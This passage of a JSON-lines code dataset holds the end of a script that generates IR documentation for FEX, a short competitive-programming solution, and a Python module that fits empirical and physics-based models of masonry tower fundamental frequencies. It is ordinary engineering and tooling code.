(\"SSAArgs\" in op_vals and len(op_vals[\"SSAArgs\"]) > 0)\n            HasSSAArgNames = \"SSANames\" in op_vals\n            HasArgs = \"Args\" in op_vals\n            SSAArgsCount = 0\n            ArgCount = 0\n            if (HasSSAArgs):\n                SSAArgsCount = int(op_vals[\"SSAArgs\"])\n            if (HasArgs):\n                ArgCount = len(op_vals[\"Args\"])\n\n            TotalArgsCount = SSAArgsCount + (ArgCount / 2)\n\n
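            # Render the op signature line: an optional %dest, then the SSA\n            # arguments, then the <type name> arguments. ArgComma below is indexed\n            # by the FinalArg boolean: False (0) picks \", \", True (1) picks \"\".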
output_file.write(\">\")\n if (HasDest):\n output_file.write(\"%dest = \")\n\n output_file.write(\"%s \" % op_key)\n\n ArgComma = (\", \", \"\")\n if (HasSSAArgs):\n for i in range(0, SSAArgsCount):\n FinalArg = (i + 1) == TotalArgsCount\n if (HasSSAArgNames):\n output_file.write(\"%%%s%s\" % (op_vals[\"SSANames\"][i], ArgComma[FinalArg]))\n else:\n output_file.write(\"%%ssa%d%s\" % (i, ArgComma[FinalArg]))\n\n if (HasArgs):\n Args = op_vals[\"Args\"]\n for i in range(0, ArgCount, 2):\n FinalArg = ((i / 2) + SSAArgsCount + 1) == TotalArgsCount\n data_type = Args[i]\n data_name = Args[i + 1]\n output_file.write(\"\\<%s %s\\>%s\" % (data_type, data_name, ArgComma[FinalArg]))\n\n output_file.write(\"\\n\\n\")\n\n if (\"Desc\" in op_vals):\n desc = op_vals[\"Desc\"]\n if (isinstance(desc, list)):\n for line in desc:\n output_file.write(\"%s\\n\\n\" % line)\n else:\n output_file.write(\"%s\\n\" % op_vals[\"Desc\"])\n else:\n output_file.write(\"XXX: Missing op desc!\\n\")\n\ndef print_ir_defines(defines):\n output_file.write(\"## Defines\\n\")\n output_file.write(\"```cpp\\n\")\n for define in defines:\n output_file.write(\"%s\\n\" % (define))\n output_file.write(\"```\\n\")\n\nif (len(sys.argv) < 3):\n sys.exit()\n\noutput_filename = sys.argv[2]\njson_file = open(sys.argv[1], \"r\")\njson_text = json_file.read()\njson_file.close()\n\njson_object = json.loads(json_text)\njson_object = {k.upper(): v for k, v in json_object.items()}\n\nops = json_object[\"OPS\"]\ndefines = json_object[\"DEFINES\"]\n\nget_ir_classes(ops, defines)\n\noutput_file = open(output_filename, \"w\")\n\nprint_ir_op_index()\n\noutput_file.write(\"# IR documentation\\n\\n\")\n\nprint_ir_ops()\n\nprint_ir_defines(defines)\n\noutput_file.close()\n","repo_name":"merryhime/FEX","sub_path":"External/FEXCore/Scripts/json_ir_doc_generator.py","file_name":"json_ir_doc_generator.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"18226436138","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\nh = list(map(int, input().split()))\ncnt = 1\nfor i in range(n-1):\n if h[i] > h[i+1]:\n continue\n cnt += 1\nprint(cnt)\n","repo_name":"jun673012/Algorithm","sub_path":"BOJ/28014.py","file_name":"28014.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30747923455","text":"#Class to deal with empirical relation\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.optimize import curve_fit\nimport uncertainties as unc\nimport uncertainties.unumpy as unp\nfrom scipy import stats\nimport ipdb as db\nimport sys\nfrom figure_rule import *\n\n#default Parameters to plot\nmpl.rcParams['lines.linewidth'] = 2.0\nmpl.rcParams.update({'font.size': 14})\n\n\nclass Formulation():\n\t\"\"\"Attributing empirical and physic based model to a single slender structure\"\"\"\n\tdef __init__(self, slender_st):\n\t\t\"\"\"\n\t\tsingle attribut class : structures \n\t\t\"\"\"\n\t\tself.slender_st = slender_st\n\t\tself.shape = self.slender_st['shape']\n\t\tself.height = float(self.slender_st['H'])\n\t\tself.effective_height = float(self.slender_st['Heff'])\n\t\tself.breadth = float(self.slender_st['breadth'])\n\t\tself.length = float(self.slender_st['length'])\n\t\tself.max_thickness = float(self.slender_st['max_wall_thickness'])\n\t\tself.f0 = 
float(self.slender_st['f0'])\n\t\ttry:\n\t\t\tself.young = 1e9*float(self.slender_st['E'])\n\t\texcept:\n\t\t\tself.young = np.max([1e9*float(item) for item in self.slender_st['E'].split(',')])\n\n\t\ttry:\n\t\t\tself.density = 100*float(self.slender_st['density'])\n\t\texcept:\n\t\t\tself.density = np.max([100*float(item) for item in self.slender_st['density'].split(',')])\n\n\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# ~~~~~  Parameters for empirical models ~~~~~\n\t\t# ~~~~~  cf. Table ? in paper doi: ~~~~~\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# Check whether each parameter exists (-1 marks a missing value)\n\t\tself.exist_height = self.height != -1\n\t\tself.exist_effective_height = self.effective_height != -1\n\t\tself.exist_breadth = self.breadth != -1\n\t\tself.exist_length = self.length != -1\n\t\tself.exist_max_thickness = self.max_thickness != -1\n\t\tself.exist_E = self.young != -1\n\t\tself.exist_rho = self.density != -1\n\n\t\tself.emp_model = {'model_1_1' :{'a1' : [20.], 'b1' : [-3./4.], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.], 'exist': [self.exist_height]},\n\t\t 'model_1_2' :{'a1' : [1./0.0187], 'b1' : [-1.], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.], 'exist': [self.exist_height]},\n\t\t 'model_1_3' :{'a1' : [1./0.01137], 'b1' : [-1.138], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_1_4' :{'a1' : [1./0.0151], 'b1' : [-1.08], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_1_5' :{'a1' : [28.35], 'b1' : [-0.83], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_1_6' :{'a1' : [135.343], 'b1' : [-1.32], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_2' :{'a1' : [3.58], 'b1' : [0.], 'a1s' : [0.], 'b1s' : [0.57], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_3' :{'a1' : [208.54], 'b1' : [-1.18], 'a1s' : [0.], 'b1s' : [0.55], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_breadth]},\n\t\t 'model_4_1' :{'a1' : [1./0.06], 'b1' : [-0.5], 'a1s' : [2.], 'b1s' : [0.5], 'b2s' : [0.5], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_4_2':{'a1' : [1./0.03], 'b1' : [-0.83], 'a1s' : [1.], 'b1s' : [0.17], 'b2s' : [0.5], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_5':{'a1' : [1./0.0117], 'b1' : [0], 'a1s' : [-9.632], 'b1s' : [3], 'b2s' : [-1], 'a2s' : [94.786], 'a3s' : [144.461] ,'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_6':{'a1' : [12.96], 'b1' : [-0.686], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [-0.686], 'exist': [self.exist_height, self.exist_breadth, self.exist_effective_height]},\n\t\t 'model_7':{'a1' : [14.61], 'b1' : [-0.811], 'a1s' : [0.], 'b1s' : [-0.254], 'b2s' : [0.], 'b1e': [-0.341], 'exist': [self.exist_height, self.exist_breadth, self.exist_effective_height]},\n\t\t }\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# ~~~~~  Parameters for physics based models ~~~~~\n\t\t# ~~~~~  cf. Table ?
in paper doi: ~~~~~\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\tself.pb_model = {'model_1' : {'C1': np.sqrt(1.375), 'C2' : 0, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho]},\n\t 'model_2' : {'C1': 0.8 , 'C2' : 1, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho, self.exist_effective_height]},\n\t 'model_3' : {'C1': 0.8 , 'C2' : 0, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho]},\n\t 'model_4' : {'C1': 800 , 'C2' : 0, 'C3' : 0, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height]}\n\t\t\t\t}\n\n\n\tdef f0_emp(self, model_name):\n\t\t\"\"\" \n\t\tGeneral formulation of the fundamental frequency for empirical models\n\t\tmodel_name : Name of the physic based model to use\n\t\tH [m]: height of the tower\n\t\tls[m]: breadth (characteristic size of the section, minimum size)\n\t\thn[m]: interaction height between the tower and the adjacent structure\n\t\t\"\"\"\n\n\t\tparam = self.emp_model[model_name]\n\t\t\n\t\tif False not in param['exist']:\n\t\t\n\t\t\t# Parameters of the empirical model\n\t\t\t# ---------------------------------\n\t\t\tparam = self.emp_model[model_name]\n\t\t\ta1 = param['a1']\n\t\t\tb1 = param['b1']\n\t\t\ta1s = param['a1s']\n\t\t\tb1s = param['b1s']\n\t\t\tb2s = param['b2s']\n\t\t\tb1e = param['b1e']\n\n\t\t\talphal = np.divide(self.breadth,self.height)\n\t\t\talphah = np.divide(self.height - self.effective_height, self.height)\n\t\t\t#print('Empirical frequency succesfully computed from model: %s' %model_name)\n\n\t\t\treturn np.multiply(a1,np.power(self.height,b1)*np.power(alphal,b1s)*np.power(np.add(1.,np.multiply(a1s,alphal)),b2s)*np.power(np.subtract(1,alphah),b1e))\n\n\t\telse:\n\t\t\tprint(\"Warning: Empirical formulation cannot be used. 
A feature is missing.\")\n\t\t\treturn [None]\n\t\t\tpass\n\n\t\n\tdef f0_phy(self, model_name, theta):\n\t\t\"\"\" \n\t\tGeneral formulation of the fundamental frequency for physics based models\n\t\tmodel_name : Name of the physic based model to use\n\t\ttheta: rotation angle to compute the radius of inertia \n\t\t\"\"\"\n\t\t# Parameters of the physics based model\n\t\t# ---------------------------------\n\t\tparam = self.pb_model[model_name]\n\t\tc1 = param['C1']\n\t\tc2 = param['C2']\n\t\tc3 = param['C3']\n\n\t\tself.theta = theta\n\n\t\tif False not in param['exist']:\n\t\t\n\t\t\tself.alpha_t = self.max_thickness/self.breadth\n\t\t\tself.alpha_L = self.length/self.breadth\n\t\t\tself.alphah = np.divide(self.height - self.effective_height,self.height)\n\t\t\n\t\t\t# Compute the surface and Second moment of inertia\n\t\t\tif (self.shape == 'REC') or (self.shape == 'SQ'):\n\t\t\t\tself.alpha_shs = 1\n\t\t\t\tself.alpha_shi = 1/12\n\t\t\telse:\n\t\t\t\tself.alpha_shs = np.pi/4\n\t\t\t\tself.alpha_shi = np.pi/64\n\t\t\t\t\n\t\t\tS = 2*self.alpha_shs*(self.breadth**2)*(self.alpha_L + 1 - 2*self.alpha_t)\n\t\t\tself.alpha_S = 2*self.alpha_shs*(self.alpha_L + 1 - 2*self.alpha_t)\n\t\t\tself.alpha_Ix = self.alpha_shi*(self.alpha_L - (self.alpha_L - 2*self.alpha_t)*((1-2*self.alpha_t)**3))\n\t\t\tself.alpha_Iy = self.alpha_shi*(self.alpha_L**3 - ((self.alpha_L - 2*self.alpha_t)**3)*(1-2*self.alpha_t))\n\t\t\t\t\n\n\t\t\t# Compute radius of inertia\n\t\t\tif model_name == 'model_1':\n\t\t\t\tr = self.breadth*np.sqrt(np.divide(1,self.alpha_S))*np.sqrt(np.divide(self.alpha_Ix + self.alpha_Iy, 2) + (np.divide(self.alpha_Ix - self.alpha_Iy, 2)* np.cos(2*self.theta)))\n\n\t\t\telif model_name == 'model_2':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.5*(1-self.alpha_t)\n\n\t\t\telif model_name == 'model_3':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.125\n\t\t\t\n\t\t\telif model_name == 'model_4':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.125\n\n\t\t\tself.alpha_h = np.divide(self.height-self.effective_height,self.height)\n\n\t\t\treturn c1*np.divide(1.875**2, 2*np.pi)*np.divide(r,np.power(self.height,2))*np.power(np.divide(1, 1 - self.alpha_h),c2)*np.power(np.sqrt(np.divide(self.young, self.density)),c3)\n\n\t\telse:\n\t\t\tprint(\"Warning: Physics based formulation cannot be used. 
A feature is missing.\")\n\t\t\treturn None\n\t\t\tpass\n\n\n\n\nclass Regression():\n\t\"\"\"Attributing empirical and physic based model to a single slender structure\"\"\"\n\tdef __init__(self, database):\n\t\tself.database = database\n\n\tdef model_1_emp(self, x, a1, b1):\n\t\t\"\"\"\n\t\tEmpirical model 1: Compute the regression analysis between the height (input) and the fundamental frequency (output)\n\t\tCorrespond to model 1_1 -> model 1_6 in Montabert et al, 2023\n\t\tReferences: Eurocode 8; Faccio et al, 2010; Rainieri et al, 2012; Shakya et al, 2016, Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.power(x, b1))\n\t\t\n\tdef model_2_emp(self, x, a1, b1s):\n\t\t\"\"\"\n\t\tEmpirical model 2: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 2 in Montabert et al, 2023\n\t\tReferences: Shakya et al, 2016.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.power(x, b1s))\n\n\tdef model_3_emp(self, x, a1, b1, b1s):\n\t\t\"\"\"\n\t\tEmpirical model 3: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 3 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.power(x[:,1], b1s))\n\n\tdef model_4_emp(self, x, a1, b1, b1s, a1s, b2s):\n\t\t\"\"\"\n\t\tEmpirical model 4_1 and model 4_2: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 9 in Montabert et al, 2023\n\t\tReferences: NCSR-02\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.multiply(np.power(x[:,1], b1s), np.power(1+(np.multiply(a1s,x[:,1])), b2s)))\n\t\t#return a1*(x[:,0]**b1)*(x[:,1]**b1s)*((1+(a1s*x[:,1]))**b2s)\n\n\tdef model_5_emp(self, x, a1, b1s, a1s, b2s, a2s, a3s):\n\t\t\"\"\"\n\t\tEmpirical model 5: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 5 in Montabert et al, 2023\n\t\tReferences: Formisano et al, 2017.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.multiply(np.power(x[:,1], b1s), np.power(1+(a1s*x[:,1]) + np.multiply(a2s, np.power(x[:,1],2)) + np.multiply(a3s, np.power(x[:,1],3)), b2s)))\n\t\t#return a1*(x[:,1]**b1s)*((1+(a1s*x[:,1]) + (a2s*x[:,1])**2 + (a3s*x[:,1])**3)**b2s)\n\n\tdef model_6_emp(self, x, a1, b1, b1e):\n\t\t\"\"\"\n\t\tEmpirical model 6 : Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 6 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\t#return np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.power( 1 - x[:,1], b1e))\n\t\treturn a1*(x[:,0]**b1)*((1-x[:,1]))**b1e\n\n\tdef model_7_emp(self, x, a1, b1, b1s, b1e):\n\t\t\"\"\"\n\t\tEmpirical model 13 : Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 13 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.multiply(np.power(x[:,1], b1s) ,np.power( 1 - x[:,2], b1e)))\n\n\n\tdef R_squarred(self, model, experiment):\n\t\t\"\"\"Compute R-squarred for a distribution\"\"\"\n\t\tself.SSR = np.sum((experiment - model)**2)\n\t\tself.SST = np.sum((experiment - np.mean(experiment))**2)\n\n\t\treturn 1 - 
np.divide(self.SSR, self.SST)\n\t\n\tdef power_law(self, x, a, b):\n\t\t\"\"\" Power law function for curve fitting\"\"\"\n\t\treturn np.divide(1, a*np.power(x, b))\n\n\tdef fit_power_model(self, model):\n\t\t\"\"\"Fit relation\"\"\"\n\n\t\tydata = self.database['f0']\n\t\tif model == 'model_1':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.asarray(self.database['H'])\n\t\t\tself.f = self.model_1_emp\n\n\t\telif model == 'model_2':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.asarray(np.divide(self.database['breadth'], self.database['H']))\n\t\t\tself.f = self.model_2_emp\n\t\t\t\n\t\telif model == 'model_3':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_3_emp\n\n\t\telif model == 'model_4':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_4_emp\n\n\t\telif model == 'model_5':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_5_emp\n\n\t\telif model == 'model_6':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['Heff'] != -1) & (self.database['Heff'] != 0) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['H'] - self.database['Heff'], self.database['H'])))).T\n\t\t\tself.f = self.model_6_emp\n\n\t\telif model == 'model_7':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['Heff'] != -1) & (self.database['Heff'] != 0) & (self.database['f0'] != -1) & (self.database['breadth'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'] , self.database['H'])), np.asarray(np.divide(self.database['H'] - self.database['Heff'], self.database['H'])))).T\n\n\t\t\tself.f = self.model_7_emp\n\n\n\t\t#Curve fit\n\t\tself.pars, self.cov = curve_fit(f=self.f, xdata= self.input, ydata= self.output, maxfev = 100000000)\n\n\t\t#standard error of parameters\n\t\tself.stderr = np.sqrt(np.diag(self.cov))\n\n\t\t\n\t\t#compute residuals\n\t\tself.res = self.database['f0'] - self.f(self.input, 
*self.pars)\n\n\t\t#Compute R-squarred\n\t\tself.R2 = self.R_squarred(self.f(self.input, *self.pars), self.database['f0'])\n\t\t\n\t\treturn self.pars, self.cov, self.stderr, self.res, self.R2\n\n\n\tdef IC(self, x, func):\n\t\t\"\"\"Compute interval confidence\n\t\tx : dedicated interval\n\t\t\n\t\t\"\"\"\n\t\t#correlated values\n\t\ta, b = unc.correlated_values(self.pars, self.cov)\n\n\t\t#distributed model\n\t\tcy = func(x, a, b)\n\n\t\t#nominal value and standard deviation\n\t\tself.nom = unp.nominal_values(cy)\n\t\tself.std = unp.std_devs(cy)\n\n\t\treturn self.nom, self.std\n\n\n\nif __name__ == \"__main__\":\n\n\t# Load the masonry database\n\tpath_data = 'TURRIS.xlsx'\n\tdatabase = pd.read_excel(path_data)\n\n\t\"\"\"# TEST 1: Empirical and physics based formulation to evaluate the fundamental frequency\n\t# Choose your model\n\tmodel_emp = 'model_1'\n\tmodel_pb = 'model_2'\n\n\t# Read one tower at a time\n\tfor ii in range(len(database)):\n\t\tprint(\"~~~~~~~~~~~~ Tower # %s ~~~~~~~~~~~\" % str(ii))\n\t\ttower = Formulation(database.iloc[ii]) # Build Empirical formulation object\n\t\tprint(\"Tower name: %s. References: %s\" % (tower.slender_st['building_name'], tower.slender_st['references']))\n\t\t# ~~~~ Empirical formulation of f0 ~~~~\n\t\tf0_model_emp = tower.f0_emp(model_emp)\n\t\tif f0_model_emp[0] != None:\n\t\t\tprint('Empirical model: %s, frequency: %s Hz' % (model_emp, f0_model_emp[0]))\n\t\t\tprint('Relative error between exp. f0 and emp. f0: %s' % np.divide(tower.f0 - f0_model_emp, tower.f0)[0])\n\t\t# ~~~~ Physics based formulation of f0 ~~~~\n\t\tf0_model_pb = tower.f0_phy(model_pb, 45)\n\t\tif f0_model_pb != None:\n\t\t\tprint('Physics based model: %s, frequency: %s Hz' % (model_pb, f0_model_pb))\n\t\t\tprint('Relative error between exp. f0 and emp. 
f0: %s' % np.divide(tower.f0 - f0_model_pb, tower.f0))\n\t\tprint(' ')\"\"\"\n \n\n\t# TEST 2: Regression analysis\n\t# ~ You can create your own database or use the default one\n\n\tdatabase = pd.read_excel(path_data) #default database\n\tdatabase.fillna(-1, inplace=True) #fill NaN\n\n\t# Test the database excluding outliers\n\t#database = database[database['f0'] < 8]\n\n\n\t# NOTE: the section headers below use the model numbering of Table 2 in the paper;\n\t# fit_power_model() expects the class method naming (model_1 ... model_7).\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 1 --> 6 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg1 = Regression(database)\n\n\tprint('Regression analysis to update first empirical model (model_1 --> model_6)')\n\tpars, cov, ste, res, R2_tower = Reg1.fit_power_model(\"model_1\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 7 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg2 = Regression(database)\n\t# fit power law: model 7 in Table 2 (class method model_2_emp)\n\tprint('Regression analysis to update first empirical model (model_7)')\n\tpars, cov, ste, res, R2_tower = Reg2.fit_power_model(\"model_2\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1s : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 8 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg3 = Regression(database)\n\t# fit power law: model 8 in Table 2 (class method model_3_emp)\n\tprint('Regression analysis to update first empirical model (model_8)')\n\tpars, cov, ste, res, R2_tower = Reg3.fit_power_model(\"model_3\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 9 --> 10 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg4 = Regression(database)\n\t# fit power law: models 9 and 10 in Table 2 (class method model_4_emp)\n\tprint('Regression analysis to update first empirical model (model_9 and 10)')\n\tpars, cov, ste, res, R2_tower = Reg4.fit_power_model(\"model_4\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('a1s : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('b2s : ' , np.round(pars[4], 3), ' std : ', np.round(ste[4], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 11 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg5 = Regression(database)\n\t# fit power law: model 11 in Table 2 (class method model_5_emp)\n\tprint('Regression analysis to update 
first empirical model (model_11)')\n\tpars, cov, ste, res, R2_tower = Reg5.fit_power_model(\"model_5\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1s : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('a1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('b2s : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('a2s : ' , np.round(pars[4], 3), ' std : ', np.round(ste[4], 3) )\n\tprint('a3s : ' , np.round(pars[5], 3), ' std : ', np.round(ste[5], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 12 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg6 = Regression(database)\n\t# fit power law: model 12 in Table 2 (class method model_6_emp)\n\tprint('Regression analysis to update first empirical model (model_12)')\n\tpars, cov, ste, res, R2_tower = Reg6.fit_power_model(\"model_6\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b1e : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 13 ~~\n\t# ~~ Table 2 in Montabert et al., 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg7 = Regression(database)\n\t# fit power law: model 13 in Table 2 (class method model_7_emp)\n\tprint('Regression analysis to update first empirical model (model_13)')\n\tpars, cov, ste, res, R2_tower = Reg7.fit_power_model(\"model_7\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('b1e : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\n\n\n\t# 